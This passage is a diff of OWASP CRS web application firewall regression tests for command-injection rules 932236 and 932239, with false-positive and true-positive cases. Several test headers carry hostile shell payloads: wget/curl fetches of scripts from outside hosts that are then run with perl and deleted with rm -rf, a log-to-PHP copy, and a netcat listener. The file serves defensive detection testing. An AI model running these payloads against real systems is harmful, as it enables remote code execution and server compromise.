text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ti''me+curl+coreruleset.org" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 44 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-45 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 45 desc: "FP with word settings" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=settings" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-46 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=settings" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 46 desc: False positive against "time" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=hello; time he came" - version: HTTP/1.1 - output: - no_log_contains: id "932236" - - test_title: 932236-47 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=hello; time he came" + version: HTTP/1.1 + output: + no_log_contains: id "932236" + - test_id: 47 desc: False positive against "more" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a hero; more than" - version: HTTP/1.1 - output: - no_log_contains: id "932236" - - test_title: 932236-48 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a hero; more than" + version: HTTP/1.1 + output: + no_log_contains: id "932236" + - test_id: 48 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=environment" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-49 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=environment" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 49 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=performance" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-50 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=performance" + version: HTTP/1.0 + output: + no_log_contains: id "932236" + - test_id: 50 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=env --version" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-51 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=env --version" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 51 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=perf --version" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-52 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=perf --version" + version: HTTP/1.1 + output: + log_contains: id "932236" + - test_id: 52 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 4 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 5 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: Something true positive „The Title”. After space or new line more characters - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: Something true positive „The Title”. After space or new line more characters + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 6 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Referer: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Referer: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 7 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Referer: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Referer: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 8 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: Something true positive „The Title”. After space or new line more characters - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: Something true positive „The Title”. After space or new line more characters + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 9 desc: "False negative report - user agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: ;cp /var/log/apache2/error.log evil.php - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: ;cp /var/log/apache2/error.log evil.php + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: id "932239" + - test_id: 10 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "python-requests/2.31.0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "python-requests/2.31.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 11 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Python-urllib/3.9" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Python-urllib/3.9" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 12 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 13 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "w3m/0.5.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "w3m/0.5.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 14 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 15 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "wget" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "wget" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 16 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "curl/7.81.0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "curl/7.81.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 17 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Cpanel-HTTP-Client/1.0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Cpanel-HTTP-Client/1.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 18 desc: "IXMZUXBG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: a=nc&&$a -nlvp 555 - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: a=nc&&$a -nlvp 555 + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932239" + - test_id: 19 desc: "IXMZUXBG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: a=nc&&$a -nlvp 555 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: a=nc&&$a -nlvp 555 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932239" + - test_id: 20 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "https://example.com/?args=comment" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "https://example.com/?args=comment" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 21 desc: "FP with word settings" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "https://example.com/?args=settings" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-22 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "https://example.com/?args=settings" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 22 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "environment" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-23 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "environment" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 23 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "https://example.com/?args=environment" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-24 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "https://example.com/?args=environment" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 24 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "performance" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-25 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "performance" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 25 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "https://example.com/?args=performance" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-26 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: 